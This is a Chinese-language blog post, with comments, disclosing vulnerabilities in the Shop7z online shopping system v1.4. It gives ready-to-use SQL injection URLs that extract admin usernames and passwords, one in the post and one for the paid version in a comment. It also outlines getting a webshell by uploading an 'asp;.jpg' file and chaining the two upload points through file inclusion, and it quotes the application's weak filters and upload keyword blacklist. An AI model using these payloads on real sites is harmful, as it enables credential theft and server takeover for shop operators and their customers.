Shop7z网上购物系统 v1.4 漏洞

Author:roker
文件dataname.asp
[php]
path_back=LCase(request.servervariables("QUERY_STRING"))
if instr(path_back,"insert")<>0 or instr(path_back,"update")<>0 or instr(path_back,"delete")<>0
or instr(path_back,"(")<>0 or instr(path_back,"'")<>0 or instr(path_back," or ")<>0 or instr(path_back,"replace")<>0
or instr(path_back,"eval")<>0 then
response.write "

你的网址不合法"[/php]
奇葩了。。不知他这么写和没过滤有什么区别。。
于是 看了下数据文件表的结构。。
exp:[php]
show.asp?pkid=4820%20and%201%20=%202%20union%20select%201,2,3,4,5,6,7,s_user,9,10,11,12,s_pwd,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%20from%20admin[/php]

接下来 getshell
有两个上传的地方
一个是 ewebitor
一个是他自己写的
ewebitor只能上传jpg等正常文件,其他可以利用的都删了
看他自己写的上传。。
可以上传 2013xx.asp;.jpg格式的
可是[php]
set MyFile = server.CreateObject("Scripting.FileSystemObject")
set MyText = MyFile.OpenTextFile(Server.mappath(filename)) '读取文本文件
sTextAll = lcase(MyText.ReadAll())
MyText.close
set MyFile = nothing
sStr=".getfolder|.createfolder|.deletefolder|.createdirectory|.deletedirectory|eval|雷驰新闻发布|script|"
sStr=sStr&".saveas|wscript.shell|script.encode|server.|.createobject|execute|activexobject|language="
snum = split(sStr,"|")
for i=0 to ubound(snum)
if instr(sTextAll,snum(i)) then
set filedel = server.CreateObject("Scripting.FileSystemObject")
filedel.deletefile Server.mappath(filename)
set filedel = nothing
Response.Write("

")
Response.End()
end if
next[/php]
各种过滤有木有啊
可是他忘记了文件包含!
所以 两个上传 结合在一起 就可以getshell啦~~~

3 条评论

  1. Roker

    附上收费版的exp:show.asp?pkid=4820%20and%201%20=%202%20union%20select%201,2,3,4,5,6,7,s_user,9,10,11,12,13,14,15,16,s_pwd,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42%20from%20Shop7z_Admin
    站长给个QQ求交流呀~~么么哒

    1. X谁谁怀孕
      @Roker

      没几个站用1.4的

      1. 0day5
        @X谁谁怀孕

        诺~本着研究的精神给转载了。

发表评论